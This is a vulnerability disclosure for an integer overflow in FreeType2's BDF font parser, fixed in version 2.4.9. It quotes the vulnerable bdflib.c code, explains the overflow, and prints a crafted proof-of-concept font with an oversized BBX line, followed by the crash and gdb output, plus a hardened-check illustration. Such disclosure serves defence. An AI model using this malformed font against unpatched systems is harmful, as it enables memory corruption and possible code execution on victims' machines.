FREETYPE2 BDF font integer overflow in BBX field
Byoungyoung Lee
http://twitter.com/mylifeasageek
http://exploitshop.wordpress.com

FreeType2 has an integer overflow when handling the BBX field. Because the overflow causes a much smaller buffer to be allocated, and that buffer is then filled with user-controlled data, arbitrary code execution may be possible. This is patched in FreeType2 2.4.9 (http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=c4cad30ed1b1f554aa41a98b0b0fdca6e579e22f).

You can download the PoC at http://www.cc.gatech.edu/~blee303/exploit/freetype2_bdf/bbx.bdf.

In bdflib.c:
    /* Allocate enough space for the bitmap. */
    glyph->bpr = ( glyph->bbx.width * p->font->bpp + 7 ) >> 3;

    bitmap_size = glyph->bpr * glyph->bbx.height;
    if ( bitmap_size > 0xFFFFU )
    {
      FT_ERROR(( "_bdf_parse_glyphs: " ERRMSG4, lineno ));
      error = BDF_Err_Bbx_Too_Big;
      goto Exit;
    }
    else
      glyph->bytes = (unsigned short)bitmap_size;

    if ( FT_NEW_ARRAY( glyph->bitmap, glyph->bytes ) )
      goto Exit;
1. "p->font->bpp" can be set to 0x10. "glyph->bbx.width" and "glyph->bbx.height" are short variables.
2. "glyph->bpr" can end up slightly larger than what fits in a short.
3. When computing bitmap_size, an overflow can occur that still passes the check (bitmap_size > 0xFFFFU).
4. I guess there should be a check on "glyph->bpr" as well.
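As an added illustration (my own code, not FreeType's), the following takes the BBX values from the PoC font and shows how the bytes-per-row value loses its high bits when narrowed to a 16-bit field, beside a hardened check that validates the untruncated value before anything is stored. The hardened function follows the direction of the 2.4.9 fix (checking bpr too) but is an assumption written for this example, not the project's code.

```c
#include <stdint.h>
#include <stdio.h>

/* Field widths as the advisory describes them: width, height and bpp are
 * 16-bit, and the vulnerable code stores bytes-per-row in a 16-bit field. */
typedef struct {
    unsigned short width;
    unsigned short height;
} bbx_t;

/* Vulnerable shape of the computation: the bytes-per-row value is computed
 * in int and then silently narrowed to 16 bits on assignment to glyph->bpr,
 * so the row length used later no longer matches the BBX that was parsed. */
unsigned short vuln_bpr(bbx_t bbx, unsigned short bpp)
{
    return (unsigned short)( ( bbx.width * bpp + 7 ) >> 3 );
}

/* Hardened version (assumption: modeled on the idea of the 2.4.9 fix, which
 * checks bpr as well): compute in a wide type and reject anything that would
 * not fit the 16-bit fields before it is stored anywhere.
 * Returns the bitmap size in bytes, or -1 if the BBX is rejected. */
long checked_bitmap_size(bbx_t bbx, unsigned short bpp)
{
    uint64_t bpr  = ( (uint64_t)bbx.width * bpp + 7 ) >> 3;
    uint64_t size = bpr * bbx.height;

    if ( bpr > 0xFFFFU || size > 0xFFFFU )
        return -1;                 /* BBX too big: refuse the glyph */

    return (long)size;
}

int main(void)
{
    bbx_t poc = { 53768, 39940 };  /* BBX from the sample.bdf PoC */
    bbx_t ok  = { 16, 16 };        /* an ordinary 16x16 glyph */

    printf("PoC bpr: real value %lu, stored in 16 bits as %u\n",
           ( (unsigned long)poc.width * 0x10 + 7 ) >> 3, vuln_bpr(poc, 0x10));
    printf("PoC under hardened check: %ld (-1 = rejected)\n",
           checked_bitmap_size(poc, 0x10));
    printf("16x16 1-bpp glyph: %ld bytes\n", checked_bitmap_size(ok, 1));
    return 0;
}
```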
lifeasageek@ubuntu:~/ft/git/freetype2-demos/bin$ cat ./sample.bdf
STARTFONT 2.1
FONT -gnu-unifont-medium-r-normal--16-160-75-75-c-80-iso10646-1
SIZE 16 75 75 100
FONTBOUNDINGBOX 16 16 0 -2
STARTPROPERTIES 2
FONT_ASCENT 14
FONT_DESCENT 2
ENDPROPERTIES
CHARS 1
STARTCHAR U+0041
ENCODING 65
SWIDTH 50 0
DWIDTH 8 0
BBX 53768 39940 0 -2
BITMAP
00
01
02
03
04
05
06
07
08
09
10
11
12
13
14
00
ENDCHAR
ENDFONT
lifeasageek@ubuntu:~/ft/git/freetype2-demos/bin$ ./ftbench -c 1 ./sample.bdf
Segmentation fault
lifeasageek@ubuntu:~/ft/git/freetype2-demos/bin$ gdb -q ./ftbench
Reading symbols from /home/lifeasageek/ft/git/freetype2-demos/bin/ftbench...(no debugging symbols found)...done.
(gdb) r -c 1 ./sample.bdf
Starting program: /home/lifeasageek/ft/git/freetype2-demos/bin/ftbench -c 1 ./sample.bdf

Program received signal SIGSEGV, Segmentation fault.
0x080866bf in _bdf_parse_glyphs ()
(gdb) info reg
eax            0x810d078    135319672
ecx            0x0          0
edx            0xff         255
ebx            0xff         255
esp            0xbffff320   0xbffff320
ebp            0xbffff398   0xbffff398
esi            0x0          0
edi            0x0          0
eip            0x80866bf    0x80866bf <_bdf_parse_glyphs+2131>
eflags         0x210202     [ IF RF ID ]
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0x7b         123
fs             0x0          0
gs             0x33         51
(gdb) x/5i 0x080866bf
=> 0x80866bf <_bdf_parse_glyphs+2131>: movzbl (%eax),%eax
   0x80866c2 <_bdf_parse_glyphs+2134>: mov    %eax,%edx
   0x80866c4 <_bdf_parse_glyphs+2136>: shl    $0x4,%edx
   0x80866c7 <_bdf_parse_glyphs+2139>: mov    -0x20(%ebp),%eax
   0x80866ca <_bdf_parse_glyphs+2142>: movzbl 0x80bcfc0(%eax),%eax